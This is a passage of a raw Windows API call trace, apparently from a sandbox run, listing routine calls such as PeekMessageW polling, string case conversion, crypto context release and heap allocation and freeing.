| out: lpMsg=0x8bed60) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.275] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0267.275] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.275] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0267.275] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.275] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.275] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.276] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.276] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.276] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.276] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0267.276] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.276] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.278] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.278] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.278] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.278] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.278] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.278] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.278] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.278] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.278] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.278] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.278] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.278] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.278] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.279] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.279] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.279] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.279] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.279] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.279] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.279] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.279] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.279] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.280] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.280] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.280] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.280] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.280] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.280] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.280] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.280] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.280] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.280] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.280] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.280] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.281] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.281] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.281] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.281] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.281] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0267.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab50 [0267.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.284] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.284] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0267.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.284] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.285] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.286] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.286] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.286] FreeLibrary (hLibModule=0x74d40000) returned 1 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.287] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.287] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.287] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.288] RtlAllocateHeap 